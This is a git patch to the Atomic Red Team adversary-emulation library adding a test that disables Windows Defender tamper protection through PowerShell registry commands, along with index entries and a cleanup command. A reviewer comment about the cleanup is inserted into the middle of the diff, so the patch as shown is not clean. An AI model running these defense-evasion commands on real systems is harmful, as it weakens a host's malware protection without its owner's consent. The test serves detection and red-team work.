From 660993d192575a5de7ef4cc8ec88ea18612115d1 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Wed, 30 Mar 2022 20:04:14 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 1 +
 .../Indexes/Indexes-Markdown/windows-index.md | 1 +
 atomics/Indexes/index.yaml | 14 ++++++++
 atomics/T1562.001/T1562.001.md | 35 +++++++++++++++++++
 6 files changed, 53 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 6a8d6e12..c96fbc40 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -405,6 +405,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defende
 defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Windows Defender Tamper Protection,5fde6578-9419-46ef-9258-269dc8656c3e,powershell
 defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 77b4e2e1..c769f4bd 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -266,6 +266,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defende
 defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Windows Defender Tamper Protection,5fde6578-9419-46ef-9258-269dc8656c3e,powershell
 defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
 defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 32e86603..2861d4dd 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -635,6 +635,7 @@
 - Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
 - Atomic Test #26: Disable Windows Defender with DISM [windows]
 - Atomic Test #27: Disable Defender with Defender Control [windows]
+ - Atomic Test #28: Disable Windows Defender Tamper Protection [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index d57341c2..b989287e 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -442,6 +442,7 @@
 - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
 - Atomic Test #26: Disable Windows Defender with DISM [windows]
 - Atomic Test #27: Disable Defender with Defender Control [windows]
+ - Atomic Test #28: Disable Windows Defender Tamper Protection [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 3a10811f..2e2fb8c2 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -26573,6 +26573,20 @@ defense-evasion:
 '
 name: powershell
 elevation_required: true
+ - name: Disable Windows Defender Tamper Protection
+ auto_generated_guid: 5fde6578-9419-46ef-9258-269dc8656c3e
+ description: Disabling Windows Defender tamper protection to allow attacks such
+ as [Process Doppleganging](https://medium.com/cyber-unbound/process-doppelg%C3%A4nging-684bdd6b760f).
+ Tamper Protection will be disabled after the next reboot.
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ New-Item -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature'
+ New-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 0
+ cleanup_command: Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
+ Defender\Feature' -name 'TamperData' -value 1
+ name: powershell
 T1078.002:
 technique:
 external_references:
diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md
index 96c6c1be..9c5c3a00 100644
--- a/atomics/T1562.001/T1562.001.md
+++ b/atomics/T1562.001/T1562.001.md
@@ -58,6 +58,8 @@
 - [Atomic Test #27 - Disable Defender with Defender Control](#atomic-test-27---disable-defender-with-defender-control)
+- [Atomic Test #28 - Disable Windows Defender Tamper Protection](#atomic-test-28---disable-windows-defender-tamper-protection)
+
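Review bot: The cleanup_command in the new executor block only sets `TamperData` back to 1; it never removes the `Windows Defender\Feature` policy key that the command block creates with `New-Item`, and it writes a value that may not have existed before the test, so after cleanup the host is left with a new Defender policy key rather than its original state. A cleanup that undoes exactly what the test did would be `Remove-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -Name 'TamperData'` followed by removal of the `Feature` key when the test created it. `New-Item` and `New-ItemProperty` are also invoked without `-Force`, so a repeat run on a host where the key or value already exists will most likely throw instead of reapplying the setting, which makes the test non-idempotent. The description's claim that tamper protection is disabled after the next reboot is not checked by anything in the test, so it should be hedged or backed by a verification step, and `Doppleganging` should read `Doppelgänging`. index.yaml and the same block in atomics/T1562.001/T1562.001.md are generated, so these fixes belong in the source atomic YAML, which is not part of this diff.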
@@ -1149,4 +1151,37 @@ expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$e
+
+
+
+## Atomic Test #28 - Disable Windows Defender Tamper Protection
+Disabling Windows Defender tamper protection to allow attacks such as [Process Doppleganging](https://medium.com/cyber-unbound/process-doppelg%C3%A4nging-684bdd6b760f). Tamper Protection will be disabled after the next reboot.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5fde6578-9419-46ef-9258-269dc8656c3e
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+New-Item -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature'
+New-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 0
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 1
+```
+
+
+
+
+